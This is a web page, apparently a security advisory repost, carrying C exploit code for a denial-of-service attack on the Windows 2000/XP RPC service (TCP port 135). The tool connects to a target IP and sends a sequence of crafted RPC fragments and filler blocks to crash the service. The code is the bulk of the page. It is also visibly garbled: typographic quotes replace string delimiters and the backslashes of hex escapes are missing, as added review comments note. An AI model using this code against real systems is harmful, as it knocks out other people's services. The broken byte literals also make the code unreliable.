Windows RPC DoS Exploit Code (from SPIKE to C)

Summary

The following exploit code lets you test your server for the Windows RPC DoS vulnerability described in our previous article, "Windows RPC Service DoS (SPIKE)".

Credit:

The information has been provided by lion.


Details

Exploit:
/*
************************************************************************
* MS WIN RPC DoS CODE FROM SPIKE v2.7
*
* Compile it use:
* cl winnuke.c
*
* Usage:
* winnuke targetip
*
* Code by lion, Welcomde to HUC Website Http://www.cnhonker.com
* 2002/10/22
************************************************************************
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, ‘ws2_32.lib’)

// Request fragments that main() writes to the target in numeric order
// (sendcode1 first, sendcode8 last), each followed by a run of filler bytes.
// main() sends sizeof(...)-1 bytes, so the terminating NUL is not transmitted.
// The byte values were taken from the SPIKE script the article refers to;
// their meaning is not documented in this file.
// NOTE(review): in this copy the string delimiters appear as ‘ ’ and the
// backslashes of the \x escapes are missing, so the literals as shown do not
// compile to the intended hex byte sequences.
char sendcode1[] =
  ‘x05x00x0bx03x10x00x00x00x48x00x00x00x02x00x00x00’
  ‘xd0x16xd0x16x00x00x00x00x01x00x00x00x00x00x01x00’
  ‘x60x9exe7xb9x52x3dxcex11xaaxa1x00x00x69x01x29x3f’
  ‘x02x00x02x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00’
  ‘x2bx10x48x60x02x00x00x00x05x00x00x01x10x00x00x00’
  ‘xd0x16x00x00x8fx00x00x00x20x27x01x00x00x00x02x00’
  ‘xf0x00x00x00x00x00x00x00xf0x00x00x00’;

// Sent after the first 240-byte filler block.
char sendcode2[] =
  ‘x88x13x00x00x00x00x00x00x88x13x00x00’;

// Sent after the first 5000-byte filler block.
char sendcode3[] =
  ‘xffxffxffxffxffxffxffxffx00x00x00x00x00x00x00x00’
  ‘x00x00x00x00x00x02x00x00x00x00x00x00x00x02x00x00’;

// Sent after the 512-byte filler block.
char sendcode4[] =
  ‘xfexffx00x00x00x00x00x00xfexffx00x00x3dx3dx3dx3dx’
  ‘x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3d’
  ‘x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00’
  ‘x50x10x01x00x00x00x02x00’;

// sendcode5..sendcode7 share the same 16-byte prefix and differ only in the
// trailing 8 bytes; each is followed by a 5000-byte filler block in main().
char sendcode5[] =
  ‘x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00’
  ‘x80xf9x00x00x00x00x02x00’;

char sendcode6[] =
  ‘x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00’
  ‘xb0xe2x00x00x00x00x02x00’;

char sendcode7[] =
  ‘x05x00x00x02x10x00x00x00x60x15x00x00x8fx00x00x00’
  ‘x60x15x00x00x00x00x02x00’;

// Last fragment; followed by the final 5000-byte filler block.
char sendcode8[] =
  ‘x00x00x01x10x00x00x00x00x00x00x01x10x00x00’;

/*
 * Entry point. Resolves argv[1], connects to it over TCP on argv[2]
 * (default 135) and writes the sendcode1..sendcode8 fragments, each followed
 * by a block of filler bytes, then closes the socket.
 *
 * Returns 0 after the full sequence has been sent, -1 if WSAStartup fails;
 * usage, socket, resolve, connect and first-send failures call exit(1).
 *
 * NOTE(review): exit()/atoi() (<stdlib.h>) and memset()/memcpy()
 * (<string.h>) are used without including their headers; this relies on
 * winsock2.h pulling them in — confirm with the build.
 */
int main(int argc, char *argv[])
{
  WSADATA wsaData;
  WORD wVersionRequested;
  struct hostent *pTarget;
  struct sockaddr_in sock;   // only sin_addr, sin_family and sin_port are set; the rest is never initialized
  char *targetip;
  int port,bufsize;          // bufsize is parsed from argv[3] below but never read afterwards
  SOCKET s;
  char buffer[20480];        // filler source; the largest block actually sent is 5000 bytes

  // Banner. The "rn" in these literals is "\r\n" with the backslashes lost in this copy.
  printf(‘========================= HUC Win2000/XP RPC Nuke V0.10 =======================rn’);
  printf(‘================= By Lion, Welcome to http://www.cnhonker.com =================rnn’);

  // Usage text only mentions TargetPort; the optional third argument (bufsize) is undocumented.
  if (argc < 2)
  {
    printf(‘Usage:rn’);
    printf(‘ %s <TargetIP> [TargetPort]rn’, argv[0]);
    printf(‘Example:rn’);
    printf(‘ %s 192.168.0.1rn’, argv[0]);
    printf(‘ %s 192.168.0.1 135rn’, argv[0]);
    printf(‘PS:rn’);
    printf(‘ If target is XP, try 2 times.rn’);
    exit(1);
  }

  // Winsock 1.1 is requested.
  // NOTE(review): WSAStartup returns 0 on success and a positive WSA error
  // code on failure, so a `< 0` test never fires — confirm against the
  // Winsock documentation; `!= 0` is the usual check.
  wVersionRequested = MAKEWORD(1, 1);
  if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

  // Optional arguments are converted with atoi(), so non-numeric or
  // out-of-range values silently become 0 (port 0) or whatever atoi yields.
  targetip = argv[1];
  port = 135;
  if (argc >= 3) port = atoi(argv[2]);
  bufsize = 512;
  if (argc >= 4) bufsize = atoi(argv[3]);   // assigned here, unused below

  s = socket(AF_INET, SOCK_STREAM, 0);
  if(s==INVALID_SOCKET)
  {
    printf(‘Socket error!rn’);
    exit(1);   // skips WSACleanup()
  }

  printf(‘Resolving Hostnames…n’);
  if ((pTarget = gethostbyname(targetip)) == NULL)
  {
    printf(‘Resolve of %s failed, please try again.n’, argv[1]);
    exit(1);   // skips closesocket()/WSACleanup()
  }

  // Copies h_length bytes of the first resolved address; sock is otherwise
  // not zeroed before use (no memset of the structure anywhere in this function).
  memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
  sock.sin_family = AF_INET;
  sock.sin_port = htons((USHORT)port);   // port is truncated to 16 bits here

  printf(‘Connecting…n’);
  if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))   // nonzero means failure
  {
    printf(‘Couldn’t connect to host.n’);
    exit(1);   // skips closesocket()/WSACleanup()
  }

  printf(‘Connected!…n’);
  printf(‘Sending Packets…n’);
  // Only this first send() is checked; every later send() result is ignored,
  // so a dropped connection mid-sequence still ends with the "Nuked!" banner.
  if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
  {
    printf(‘Error sending nuke Packetsrn’);
    closesocket(s);
    exit(1);   // closes the socket but skips WSACleanup()
  }

  // Filler blocks: &buffer and buffer have the same address (array object).
  // The fill bytes are written as ‘x41’ etc. in this copy; read as '\x41'..'\x48'.
  memset(&buffer, ‘x41’, 240);
  send(s, buffer, 240, 0);

  send(s, sendcode2, sizeof(sendcode2)-1, 0);
  memset(&buffer, ‘x42’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode3, sizeof(sendcode3)-1, 0);
  memset(&buffer, ‘x43’, 512);
  send(s, buffer, 512, 0);
  
  send(s, sendcode4, sizeof(sendcode4)-1, 0);
// Disabled variant that would send the whole 20480-byte buffer after sendcode4.
// memset(&buffer, ‘x44’, 20480);
// send(s, buffer, 20480, 0);

// The `/*` below is itself commented out, so everything down to `// */` is live code.
// /*
  memset(&buffer, ‘x44’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode5, sizeof(sendcode5)-1, 0);
  memset(&buffer, ‘x45’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode6, sizeof(sendcode6)-1, 0);
  memset(&buffer, ‘x46’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode7, sizeof(sendcode7)-1, 0);
  memset(&buffer, ‘x47’, 5000);
  send(s, buffer, 5000, 0);

  send(s, sendcode8, sizeof(sendcode8)-1, 0);
  memset(&buffer, ‘x48’, 5000);
  send(s, buffer, 5000, 0);
  
// */
  // Printed unconditionally once the sequence has been written; it does not
  // confirm any effect on the target.
  printf(‘Nuked! rnIf target is XP, try a again! :)rn’);
  closesocket(s);
  WSACleanup();
  return 0;
}’

Categories: Exploits